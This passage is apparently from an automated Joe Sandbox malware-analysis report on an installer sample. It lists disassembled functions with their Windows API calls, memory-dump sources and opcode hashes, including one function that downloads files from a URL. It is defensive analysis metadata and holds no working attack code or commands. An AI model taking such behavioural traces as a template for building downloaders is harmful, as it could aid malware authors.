                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectoryErrorException@8ExistsFileH_prolog3LastPathThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3549841302-0
                                                                                                                                                                      • Opcode ID: 18cd74f08ef8d41d2b89c1381c869ecec1f22cd19b284e7747c60944469d65f2
                                                                                                                                                                      • Instruction ID: c4d8b34194980d6c5eeeb8143c4f39ef78641564b84d719eb69bebb549039e22
                                                                                                                                                                      • Opcode Fuzzy Hash: 18cd74f08ef8d41d2b89c1381c869ecec1f22cd19b284e7747c60944469d65f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 1231E4319002159ACF28EFA4CC5AFBE77E2EF71354F50852DE5069B190DB30DA80C792
                                                                                                                                                                      Function 001CA606 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 001CA689
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 001CA69E
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 001CA6CA
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 001CA6DF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectSelect$CompatibleCreateDelete
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 488333989-0
                                                                                                                                                                      • Opcode ID: 82a712428776fd9b145fe53ef097a0179a908007fda5885548c965c647559d47
                                                                                                                                                                      • Instruction ID: 41cbe3179052691cc2a7356e002ff7399045fb8aac5708d8f9686bedbae9f794
                                                                                                                                                                      • Opcode Fuzzy Hash: 82a712428776fd9b145fe53ef097a0179a908007fda5885548c965c647559d47
                                                                                                                                                                      • Instruction Fuzzy Hash: 2531E27190021EAFCF12AFA0CC45EEE7BB9EF68304F044129FD05A2261DB31DA65DB91
                                                                                                                                                                      Function 5F5205F0 Relevance: 6.1, APIs: 4, Instructions: 76threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F5205F7
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 5F52060C
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(5F5BC570), ref: 5F520619
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(5F5BC570), ref: 5F5206D4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$CurrentEnterH_prolog3LeaveThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1021104131-0
                                                                                                                                                                      • Opcode ID: 07a150d1114c755f0e906abe696d4a1c8630523ea48ed5a313b799ff8a0a7783
                                                                                                                                                                      • Instruction ID: f0671496581d4f2386d8d5400cde601b82706d6f0553db4119234b18439ede04
                                                                                                                                                                      • Opcode Fuzzy Hash: 07a150d1114c755f0e906abe696d4a1c8630523ea48ed5a313b799ff8a0a7783
                                                                                                                                                                      • Instruction Fuzzy Hash: 4031F7B1A077019FD340EFA4C548A66B7E0BB88715F11867ED54A8B2D0EB70E901CB94
                                                                                                                                                                      Function 001D0545 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D054C
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA71F
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA72D
                                                                                                                                                                        • Part of subcall function 001CA6F2: GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,0017BCDE), ref: 001CA741
                                                                                                                                                                        • Part of subcall function 001CA6F2: _memset.LIBCMT ref: 001CA754
                                                                                                                                                                        • Part of subcall function 001CA6F2: PathCombineW.SHLWAPI(?,?,?), ref: 001CA784
                                                                                                                                                                        • Part of subcall function 001CA6F2: _wcscat.LIBCMT ref: 001CA796
                                                                                                                                                                        • Part of subcall function 001CA6F2: PathFileExistsW.SHLWAPI(?), ref: 001CA7A4
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000008,001CD144,?,00000000,000000CE,DLL,00000014,0017BCDE), ref: 001D0593
                                                                                                                                                                      • SHCreateDirectory.SHELL32(00000000,?,?), ref: 001D05C4
                                                                                                                                                                        • Part of subcall function 001D0426: SetupIterateCabinetW.SETUPAPI(00000000,00000000,001D0376,00000000), ref: 001D0454
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 001D05FA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePath_memset$Delete$CabinetCombineCreateDirectoryExistsH_prolog3IterateSetupTemp_wcscat
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 833124302-0
                                                                                                                                                                      • Opcode ID: 78c4994d406bfa5252e3eba63e9ad310c59c233a15b3ea49dc3c4f753b4ee403
                                                                                                                                                                      • Instruction ID: ee8b57210be22218b202877dfc343fced0240cc42d6d130801b87014e36b585d
                                                                                                                                                                      • Opcode Fuzzy Hash: 78c4994d406bfa5252e3eba63e9ad310c59c233a15b3ea49dc3c4f753b4ee403
                                                                                                                                                                      • Instruction Fuzzy Hash: 23117271A1011A9ECB15EBE4EC91BFEB378AF65314F10442EF511A72C1DF209A45DB61
                                                                                                                                                                      Function 001780FC Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00178116
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0017813D
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00178158
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0017815F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$CallbackDispatchDispatcherPeekTranslateUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1533324876-0
                                                                                                                                                                      • Opcode ID: e135f8ab3bad88ba3e8c29e5f389383278c46290ac1c83727eabd920f413ecc9
                                                                                                                                                                      • Instruction ID: 9608300440f1552fad468fb35ccc8a9753fbeec9f39401cd01ee4a81cc628a53
                                                                                                                                                                      • Opcode Fuzzy Hash: e135f8ab3bad88ba3e8c29e5f389383278c46290ac1c83727eabd920f413ecc9
                                                                                                                                                                      • Instruction Fuzzy Hash: 5401DEB124560ABFAB145FA49CCC8BBB7BCEF52399B518129F506C2410FF20CC038AA0
                                                                                                                                                                      Function 001A683D Relevance: 6.1, APIs: 4, Instructions: 59filenetworkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 001A6871
                                                                                                                                                                      • _memset.LIBCMT ref: 001A68A0
                                                                                                                                                                      • URLDownloadToCacheFileW.URLMON(00000000,?,?,00000104,00000000,00000000), ref: 001A68B8
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?), ref: 001A68C8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Download$CacheDelete_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1835763934-0
                                                                                                                                                                      • Opcode ID: 0ebd94bfa151c37a55f8b904ae8babb2c2a14481cb8affe0f166c11abbb738b3
                                                                                                                                                                      • Instruction ID: f6b6f41a52d68575323ff778e25b24719848486286646df18166c04d6d41dc3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 0ebd94bfa151c37a55f8b904ae8babb2c2a14481cb8affe0f166c11abbb738b3
                                                                                                                                                                      • Instruction Fuzzy Hash: 1601C475511218AACB21EB669C09EEFBBBCEF4AB94F040061B504D3041E778CE90CAE5
                                                                                                                                                                      Function 5F520345 Relevance: 6.1, APIs: 4, Instructions: 53networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAAsyncSelect.WS2_32(?,00000000,?,00000000), ref: 5F520382
                                                                                                                                                                      • shutdown.WS2_32(?,00000002), ref: 5F52038D
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 5F5203A3
                                                                                                                                                                      • WSACancelAsyncRequest.WS2_32(?), ref: 5F5203D8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Async$CancelRequestSelectclosesocketshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3577682533-0
                                                                                                                                                                      • Opcode ID: 89aba77fc55acd28d3a31905f95565705f9748df85fbdf5e3dccce348c0e8f08
                                                                                                                                                                      • Instruction ID: 0bdccb47dbdcccc74ec86999ea28107da39b3abbc5df24e13bb0efd0c20c8024
                                                                                                                                                                      • Opcode Fuzzy Hash: 89aba77fc55acd28d3a31905f95565705f9748df85fbdf5e3dccce348c0e8f08
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F11E0B12027008BD7249B68D588F6A73E5AF84B31F00472DF0AB875D1CB74F845CB80
                                                                                                                                                                      Function 00181F06 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00181F0D
                                                                                                                                                                        • Part of subcall function 0017DEB6: GetFileAttributesW.KERNEL32(?), ref: 0017DEBA
                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 00181F43
                                                                                                                                                                        • Part of subcall function 00181F06: CreateDirectoryW.KERNEL32(?,00000000), ref: 00181F75
                                                                                                                                                                        • Part of subcall function 00181F06: GetLastError.KERNEL32 ref: 00181F7F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesCreateDirectoryErrorFileH_prolog3Last_wcsrchr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2010142796-0
                                                                                                                                                                      • Opcode ID: 69a04b55cf8da8708b01aad4e49cc3353bf6f6a19cd90af42695ab8b97df5ddb
                                                                                                                                                                      • Instruction ID: 5734a820d58c0367820f3f7d1e8780f99d782e3181084bb0631df7a97578383d
                                                                                                                                                                      • Opcode Fuzzy Hash: 69a04b55cf8da8708b01aad4e49cc3353bf6f6a19cd90af42695ab8b97df5ddb
                                                                                                                                                                      • Instruction Fuzzy Hash: 3701F732504111F7DF227B31AC469BE3B29AF31B50F214429F90CEA191DF208E8A9F51
                                                                                                                                                                      Function 0019667F Relevance: 6.0, APIs: 4, Instructions: 43windowtimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadIconW.USER32(000000CD), ref: 00196699
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,00000284), ref: 00196703
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,00000284), ref: 0019670B
                                                                                                                                                                      • SetTimer.USER32(?,00002711,000007D0,00000000), ref: 0019671B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Icon$NotifyShell_$LoadTimer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2558709860-0
                                                                                                                                                                      • Opcode ID: 40ea1f4321b9891d95e23553dd9687ef201dee18e4b248c31b6c6e5d6c40118f
                                                                                                                                                                      • Instruction ID: c6f42910310b167d6b828331a8bf56e17e4ab5b353f98455c3fc946137a849b9
                                                                                                                                                                      • Opcode Fuzzy Hash: 40ea1f4321b9891d95e23553dd9687ef201dee18e4b248c31b6c6e5d6c40118f
                                                                                                                                                                      • Instruction Fuzzy Hash: 8E018074501741DFEB20CF74DC89F97BBF8EB48348F00482EE59996251C7B56954CB60
                                                                                                                                                                      Function 001B14AF Relevance: 6.0, APIs: 4, Instructions: 29windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindow.USER32 ref: 001B14C3
                                                                                                                                                                      • IsWindowEnabled.USER32(?), ref: 001B14D0
                                                                                                                                                                      • PostMessageW.USER32(?,000008C7,?,?), ref: 001B14F3
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 001B1500
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$EnabledInvalidateMessagePostRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2423392173-0
                                                                                                                                                                      • Opcode ID: abc5e53d118f97ca84c1c4e9832b9379a6217b304617f6730af92a0a4fdc89c3
                                                                                                                                                                      • Instruction ID: 87c1b7d83d48541a9e46217771a51974561468dc277272108577149aba8d03cf
                                                                                                                                                                      • Opcode Fuzzy Hash: abc5e53d118f97ca84c1c4e9832b9379a6217b304617f6730af92a0a4fdc89c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EF05431600F10FBFB215B64DC1DFD67BE5BB10705F814818F596C54A0DFA29810DB64
                                                                                                                                                                      Function 001EE98B Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 001EE99E
                                                                                                                                                                        • Part of subcall function 001F30A0: __FindPESection.LIBCMT ref: 001F30FB
                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 001EE9AE
                                                                                                                                                                      • __freeptd.LIBCMT ref: 001EE9B8
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 001EE9C1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3182216644-0
                                                                                                                                                                      • Opcode ID: eb6b018a5a20a53f0a34e43635ef140f39839d4cb68eac3dd632fa527b87de45
                                                                                                                                                                      • Instruction ID: 0ab2573f532e12e35be8ddd515b6149b74787252214249747dd528ff8d406f87
                                                                                                                                                                      • Opcode Fuzzy Hash: eb6b018a5a20a53f0a34e43635ef140f39839d4cb68eac3dd632fa527b87de45
                                                                                                                                                                      • Instruction Fuzzy Hash: C1D0123100065DABEF2427F6FD0E76A36D95F60364F5400107908804B2DFB4D8D1C926
                                                                                                                                                                      Function 0016D200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0016D244
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0016D25B
                                                                                                                                                                        • Part of subcall function 001E5546: _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                                      • String ID: P "
                                                                                                                                                                      • API String ID: 4063778783-3541668580
                                                                                                                                                                      • Opcode ID: d9897f223f574d6407a90ecd364fd20bdd58f211eb191a44feb76d2f525e0f2d
                                                                                                                                                                      • Instruction ID: 04e82564f89a3afa33d4b4ec20a774bd6b41f61335ee80de292769f49e5b8f3b
                                                                                                                                                                      • Opcode Fuzzy Hash: d9897f223f574d6407a90ecd364fd20bdd58f211eb191a44feb76d2f525e0f2d
                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0E2B1A042006AD308DF64EA52B6E72A2ABD4700F448A2DF41681184EB34C62CC543
                                                                                                                                                                      Function 5F4D9329 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 5F4D935C
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 5F4D936A
                                                                                                                                                                        • Part of subcall function 5F4D9134: _wcslen.LIBCMT ref: 5F4D913B
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.] __open_file create file(%s) fail! error code is %d, xrefs: 5F4D9379
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
